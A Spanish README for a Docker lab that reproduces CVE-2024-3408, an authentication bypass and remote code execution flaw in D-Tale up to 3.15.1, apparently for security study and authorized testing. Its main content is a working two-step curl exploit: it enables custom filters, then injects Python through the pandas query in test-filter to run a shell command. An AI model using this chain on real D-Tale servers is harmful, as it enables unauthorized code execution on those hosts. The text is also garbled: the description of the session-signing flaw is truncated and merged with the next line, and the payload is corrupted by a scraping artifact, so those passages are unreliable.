
Laboratorio de vulnerabilidades para CVE-2024-3408 - Bypass de autenticación y RCE en D-Tale
Entorno de laboratorio reproducible para CVE-2024-3408, una vulnerabilidad de omisión de autenticación y ejecución remota de código en D-Tale.
Las versiones de D-Tale hasta la 3.15.1 son vulnerables debido a:
"Dtale") para el firmado de sesiones Flask - permite la falsificación de cookies de sesióntest-filter utiliza pandas query que puede ser abusado para ejecutar código Python arbitrarioCVSS: 9.8 (Crítico)
Afectadas: D-Tale <= 3.15.1
docker compose up -d --build
D-Tale estará disponible en http://localhost:40000
# Paso 1: Habilitar filtros personalizados
curl -s "http://localhost:40000/dtale/update-settings/1?settings=%7B%22enable_custom_filters%22%3Atrue%7D"
# Esperado: {"success":true}
# Paso 2: Ejecutar comando mediante inyección de consulta pandas
curl -s -G "http://localhost:40000/dtale/test-filter/1" \
--data-urlencode "[email protected].__import__('os').popen('id').read()"
# Esperado: La respuesta contiene "uid=" y "gid=" (salida del comando en el mensaje de error)
docker compose down
Este laboratorio es solo con fines educativos y de pruebas de seguridad autorizadas. No lo utilices contra sistemas que no poseas o para los que no tengas permiso de prueba.